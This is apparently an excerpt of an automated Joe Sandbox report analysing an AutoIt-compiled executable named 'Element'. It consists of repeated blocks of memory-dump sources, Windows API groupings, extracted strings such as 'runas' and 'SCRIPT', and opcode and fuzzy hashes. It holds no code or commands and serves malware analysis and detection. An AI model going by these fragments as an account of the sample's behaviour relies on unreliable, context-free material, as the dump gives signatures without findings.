                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                    • API String ID: 1593035822-2030392706
                    • Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                    • Instruction ID: 3b13ba3591f77bbc331bcf458127f4d2e6d6546a808cb76159ac1f5d0c33586c
                    • Opcode Fuzzy Hash: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                    • Instruction Fuzzy Hash: 5E614C61A1E6D399EA60AF20EC801F92360BF90F96F801072E5CDC65A7DF6CED49C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ConditionInfoMaskVerifyVersion
                    • String ID: R2$ Vis$ XP$2008$^Win$dows$m:$ta
                    • API String ID: 3739615805-1714891448
                    • Opcode ID: 0fc8eafd479ed4f151cceea906d821aafa8c344c7d1bfa310519d605e54d6f45
                    • Instruction ID: 28dfe5d6ad9a2a608cf4a155d309fb4b866d60fbd839525a4abf24577b4c759e
                    • Opcode Fuzzy Hash: 0fc8eafd479ed4f151cceea906d821aafa8c344c7d1bfa310519d605e54d6f45
                    • Instruction Fuzzy Hash: 72225C32915BC099E770CF65E8643EA77A1F3E5768F104319EAA907B98EF78C690C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow
                    • String ID:
                    • API String ID: 312131281-0
                    • Opcode ID: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                    • Instruction ID: e07b9eba19894e1cc80ce6cdcc2ace75777b551518acb264f5ed69d87462766a
                    • Opcode Fuzzy Hash: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                    • Instruction Fuzzy Hash: 4A71B036608AD185E7208F65EC946EE3761FB89F95F400172DA9D87B66CF3CD986C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                    • String ID:
                    • API String ID: 1617910340-0
                    • Opcode ID: 315503640d0cebeabcd503def7dd823c6d783323a267f3e28206e8480c18e3c9
                    • Instruction ID: 976b79ba5b7d48e9356c4feb3556e3842cdc11cb0c4ff4be90aa95f12079d8dc
                    • Opcode Fuzzy Hash: 315503640d0cebeabcd503def7dd823c6d783323a267f3e28206e8480c18e3c9
                    • Instruction Fuzzy Hash: EAC1AD36720A4096FB10CFA9D4B86ED3771F369BA8F010215DE2A9B7D4DB34D89AC300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: $ $
                    • API String ID: 3215553584-3665324030
                    • Opcode ID: 134084e6dc032c73d0b45547bc5d58451d4eb7be48a728620d9d75ebaf16d494
                    • Instruction ID: db9bc670cd97e2fad3eb10bea37f3cf1afba76f65fc1167e3c852c9d9a050a0e
                    • Opcode Fuzzy Hash: 134084e6dc032c73d0b45547bc5d58451d4eb7be48a728620d9d75ebaf16d494
                    • Instruction Fuzzy Hash: CE12B172A05BC0A1FB65DB55E4783DAA3A5F7A5B80F409625EE8D53B99EF38C0D0C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID: +
                    • API String ID: 3744519093-2126386893
                    • Opcode ID: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                    • Instruction ID: 370bbc93ebe22429614e6d70a1305c02720c5b66fc07e0aef8c667e3da320595
                    • Opcode Fuzzy Hash: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                    • Instruction Fuzzy Hash: D3E1C261B0E2A682EA706E295D5817D6659FB49FC2F440236E9CEC7BD6CF3DED408700
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: 5#$l$uia
                    • API String ID: 0-1699049455
                    • Opcode ID: 725f9fc44d4f20c7688d1c050ec3a8172a0e34ba7edca7126311d9ef90c534aa
                    • Instruction ID: 0da73a4c0637be1bd7f4983c0dd52567bf2db7881d2025d8ba5e0fa702885615
                    • Opcode Fuzzy Hash: 725f9fc44d4f20c7688d1c050ec3a8172a0e34ba7edca7126311d9ef90c534aa
                    • Instruction Fuzzy Hash: 9F025F32614B8495EB20CF65E8783EA77A1F7A9788F004215EE8D4BB59EBBCD5C5C700
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                    • Instruction ID: 9856fd7db8ef6e99b484fc7f3ca97a45420a04e3886476a6330ce0a7ae04114d
                    • Opcode Fuzzy Hash: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                    • Instruction Fuzzy Hash: BAE1B036B08BC286EB50CF25E8402AD77A0FB88B99F404636DA9D87B95DF3CD945C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                    • String ID: utf8
                    • API String ID: 3069159798-905460609
                    • Opcode ID: baf6e175754eebbbb3d4a4c8c78486df3b9de2ab08ece7b525ea66e24296a698
                    • Instruction ID: 002d55cd9889ce8ae82ed239d879bfcbf235e7a2e025da7f3e746a17c01ad52f
                    • Opcode Fuzzy Hash: baf6e175754eebbbb3d4a4c8c78486df3b9de2ab08ece7b525ea66e24296a698
                    • Instruction Fuzzy Hash: 0491BBB6300780A6FB24AF61D4793DA23E4F7A4B80F488125DE4947796EB78C6D3C761
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                    • String ID:
                    • API String ID: 2591520935-0
                    • Opcode ID: 46b67beaa7f79cf31c656f6efd9a45f3595a32c4283a6d05a191e21c9e949722
                    • Instruction ID: 073673a5e6e59336714f307bb9a7ea579f967f900ea4163ac0566e4ba3f345c9
                    • Opcode Fuzzy Hash: 46b67beaa7f79cf31c656f6efd9a45f3595a32c4283a6d05a191e21c9e949722
                    • Instruction Fuzzy Hash: F57148B2700610AAFB11AB74D8B87ED23F4F768B88F4444668E1957695EB38C4C7C350
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT
                    • API String ID: 3051347437-3967369404
                    • Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                    • Instruction ID: ed471db001c9b2b738268b7dee3a1973d1558ed07d3ca089c67aebf0da893452
                    • Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                    • Instruction Fuzzy Hash: E0213D76709B9182EB108F22E858A2973A0FB99F86F045135DE8E87B55DF3DE845C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Process$CurrentInfoSystemVersionWow64
                    • String ID:
                    • API String ID: 1568231622-0
                    • Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                    • Instruction ID: 0074123b98f7c734344d78f77d7c4d908f1bed270925effb95e90943f92c9f21
                    • Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                    • Instruction Fuzzy Hash: 5EC16AA1E0E3D286E6B18F10AC805752B54EF11FC6F8450B5D4CEC26A7EF6CAD09C792
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1405656091-0
                    • Opcode ID: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                    • Instruction ID: 242852b1eeab442145334e6069419bce74786186c0efa1eeda1d59e4cb4e813f
                    • Opcode Fuzzy Hash: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                    • Instruction Fuzzy Hash: 488108B2F066564BEB589F35CD017B92295EB54F8AF449035DA4DCABCAEF3CE9018700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_destroy
                    • String ID: value
                    • API String ID: 2453523683-494360628
                    • Opcode ID: f81553ad2a7cfe65359a8641e8f11d870ae009f2dc06bb8eea9cb3bba749b6e5
                    • Instruction ID: 2606dfaca1040efece6fff69092142415653d69e93635538add520a45cb0665c
                    • Opcode Fuzzy Hash: f81553ad2a7cfe65359a8641e8f11d870ae009f2dc06bb8eea9cb3bba749b6e5
                    • Instruction Fuzzy Hash: 1522B072A25BC095FB10CB78D8A83ED6760EBA57A4F105311EEA957AD9EF78C1C5C300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                    • String ID:
                    • API String ID: 1239891234-0
                    • Opcode ID: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                    • Instruction ID: 123261ba96e220a3fc3b257ca58394faad833a9ab104e94a89d58adb93828d5f
                    • Opcode Fuzzy Hash: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                    • Instruction Fuzzy Hash: 47317136609B8186DB60CF25EC442AE73A4FB88B55F544135EACD87B9ADF3CC955CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                    • String ID:
                    • API String ID: 1239891234-0
                    • Opcode ID: c9e504c59835c2d35db1ffb066554be7349a78dbc61e2df5faf9e46e7f6c12d1
                    • Instruction ID: 3d31de7b2b3f2a49b288bf4d46aecd12dcf747c7f61e380e3a26abba1ea516f4
                    • Opcode Fuzzy Hash: c9e504c59835c2d35db1ffb066554be7349a78dbc61e2df5faf9e46e7f6c12d1
                    • Instruction Fuzzy Hash: FD315E36215B8096FB60CF25E8683DE73A4F798758F500516EE9D47BA8EF38C5868B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                    • Instruction ID: 50dc5b28f8df6f84f2fb5b034b4aa15cb89d29ef55e140d02251ddc43c90db77
                    • Opcode Fuzzy Hash: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                    • Instruction Fuzzy Hash: 3351C332B0A6A28BE758DF35CD4056AB764FB45B95F100235FEAD83B95CF38E8518700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _handle_error
                    • String ID: !$VUUU$fmod
                    • API String ID: 1757819995-2579133210
                    • Opcode ID: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                    • Instruction ID: b2082f6366f2b2a7daac2909ecb180c4e93d48d8fe3427426e3f71aa306604af
                    • Opcode Fuzzy Hash: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                    • Instruction Fuzzy Hash: CDB1FA11E1DFD445DAB38E3454113B6B259AFAA7D1F10C332E99EB5BA4DF2CA882D700
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C58B2BF0
                      • Part of subcall function 00007FF6C58AAF34: GetCurrentProcess.KERNEL32(00007FF6C58AB0A5), ref: 00007FF6C58AAF61
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CurrentProcess_invalid_parameter_noinfo
                    • String ID: *$.$.
                    • API String ID: 2518042432-2112782162
                    • Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                    • Instruction ID: d1b8beeca82f3cb1b7ee31617babc78063762b3b7b4b78655dc2b6899dbc6e36
                    • Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                    • Instruction Fuzzy Hash: 3E51E062F16A6585FB10EFA69C101BD23A8BB44FC9F544536CE9E97B89DE3CD8428300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: FolderPath
                    • String ID: ]\pi$mamm$rate
                    • API String ID: 1514166925-3197131006
                    • Opcode ID: b03a9b0c19f4d780f5b75ec5b43a21253624ffa7b6e2cf36b45fb0c6f46de5d0
                    • Instruction ID: a294e16c9843ad9da02f82f4f106a07ea9359068f43c042df84a0e1588cb28ba
                    • Opcode Fuzzy Hash: b03a9b0c19f4d780f5b75ec5b43a21253624ffa7b6e2cf36b45fb0c6f46de5d0
                    • Instruction Fuzzy Hash: E8518E72A18BC085E710CF65E8643EA7360F7E9798F149311EB9D17A9AEF78C2D48740
                    APIs
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6C5895AC3
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: DebugDebuggerErrorLastOutputPresentString
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 389471666-631824599
                    • Opcode ID: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                    • Instruction ID: b3848c1bb8de7ee4bc47ab4adef06467c3d8a1c26d0eb51e56ffe98b9413b61c
                    • Opcode Fuzzy Hash: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                    • Instruction Fuzzy Hash: 7B113D32615B9296E7449F22DE553B933A4FF44B56F404135C68DC2A96EF3CE868C710
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 1083639309-0
                    • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                    • Instruction ID: 2859ed5f52976f3990afc5d2f622983c8d3d1d4e9edd51058485420d9c63bb43
                    • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                    • Instruction Fuzzy Hash: 8B418026A1A6A291E710EF21EC445BE6760FB94F85F945032EACE83756DFBCE905C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                    • String ID:
                    • API String ID: 2933794660-0
                    • Opcode ID: 365799cee272a9e49a7a65d00c220567e811fc46e1a8c34076cb77dca232685e
                    • Instruction ID: 9afa1b57330a5f02fa3758b92d032932bc31d1562bccc3b1517921dcbe6c9911
                    • Opcode Fuzzy Hash: 365799cee272a9e49a7a65d00c220567e811fc46e1a8c34076cb77dca232685e
                    • Instruction Fuzzy Hash: 7B111C36711B009AFB00DB60E8683E933A4F729758F441E21EE6D867A4DB78C19A8340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
